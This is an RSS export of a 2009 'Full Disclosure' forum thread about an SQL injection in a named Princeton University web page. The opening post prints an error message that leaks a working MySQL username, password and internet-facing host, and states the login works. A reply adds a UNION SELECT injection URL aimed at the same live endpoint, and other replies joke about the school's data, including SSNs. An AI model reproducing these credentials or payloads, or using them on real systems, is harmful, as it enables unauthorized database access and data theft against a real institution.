<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>princeton.edu SQL injection/SQL username:password</title>
        <description>http://wws.princeton.edu/webmedia/list_speakers.xml?start=f'

generates the error:
RXML run error: Query failed:[...] &amp;lt;emit host=&amp;quot;mysql://wws_web:WW$W3bUs3r@www-01dept.princeton.edu:3308/wws_webcasts&amp;quot;[...]

www-01dept.princeton.edu:3308 is connectable from the internet, and the user:password works.

Is this like a major issue since it's a well known school?</description>
        <link>http://sla.ckers.org/forum/read.php?3,28306,28306#msg-28306</link>
        <lastBuildDate>Sun, 26 May 2013 00:53:19 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,28306,28347#msg-28347</guid>
            <title>Re: princeton.edu SQL injection/SQL username:password</title>
            <link>http://sla.ckers.org/forum/read.php?3,28306,28347#msg-28347</link>
            <description><![CDATA[She wasn't a teacher.. she was the manager of the IT department in the Administrative Information Systems.. yeah.. those same people who do control the mainframe with all the SS#'s and other vital information on all students, staff and faculty.. but yes, we do not have anything a hacker would want.. oh yeah, and linux is a 'hobby' OS, it'll never be mainstream.. another choice quote from her in 1999.. :)]]></description>
            <dc:creator>thrill</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Mon, 25 May 2009 01:20:25 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,28306,28346#msg-28346</guid>
            <title>Re: princeton.edu SQL injection/SQL username:password</title>
            <link>http://sla.ckers.org/forum/read.php?3,28306,28346#msg-28346</link>
            <description><![CDATA[lol, other than SSNs or some super computer that i can get my hands on to...dumb teachers]]></description>
            <dc:creator>PaPPy</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 24 May 2009 23:52:50 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,28306,28345#msg-28345</guid>
            <title>Re: princeton.edu SQL injection/SQL username:password</title>
            <link>http://sla.ckers.org/forum/read.php?3,28306,28345#msg-28345</link>
            <description><![CDATA[hmm.. maybe my old UCLA boss, Karen M. is advising them on security.. she once told me &quot;we're a school, we have nothing a hacker would want!&quot;.. :)]]></description>
            <dc:creator>thrill</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 24 May 2009 23:45:01 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,28306,28344#msg-28344</guid>
            <title>Re: princeton.edu SQL injection/SQL username:password</title>
            <link>http://sla.ckers.org/forum/read.php?3,28306,28344#msg-28344</link>
            <description><![CDATA[i think that was stated in the subject and first post...]]></description>
            <dc:creator>PaPPy</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 24 May 2009 22:12:44 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,28306,28343#msg-28343</guid>
            <title>Re: princeton.edu SQL injection/SQL username:password</title>
            <link>http://sla.ckers.org/forum/read.php?3,28306,28343#msg-28343</link>
            <description><![CDATA[Even worse,  www-01dept.princeton.edu:3308 is internet facing and the error string contains the login. I hope your school is not storing any sensitive information in said database and that they are preparing an official breach statement.]]></description>
            <dc:creator>wireghoul</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 24 May 2009 20:42:38 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,28306,28308#msg-28308</guid>
            <title>Re: princeton.edu SQL injection/SQL username:password</title>
            <link>http://sla.ckers.org/forum/read.php?3,28306,28308#msg-28308</link>
            <description><![CDATA[it's always a major issue<br />
<br />
http://wws.princeton.edu/webmedia/list_speakers.xml?start=f%27%20OR%201=0%20UNION%20SELECT%201--%20-]]></description>
            <dc:creator>Kyo</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sat, 23 May 2009 11:22:31 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,28306,28306#msg-28306</guid>
            <title>princeton.edu SQL injection/SQL username:password</title>
            <link>http://sla.ckers.org/forum/read.php?3,28306,28306#msg-28306</link>
            <description><![CDATA[http://wws.princeton.edu/webmedia/list_speakers.xml?start=f'<br />
<br />
generates the error:<br />
RXML run error: Query failed:[...] &lt;emit host=&quot;mysql://wws_web:WW$W3bUs3r@www-01dept.princeton.edu:3308/wws_webcasts&quot;[...]<br />
<br />
www-01dept.princeton.edu:3308 is connectable from the internet, and the user:password works.<br />
<br />
Is this like a major issue since it's a well known school?]]></description>
            <dc:creator>DanielG</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sat, 23 May 2009 09:10:00 -0500</pubDate>
        </item>
    </channel>
</rss>
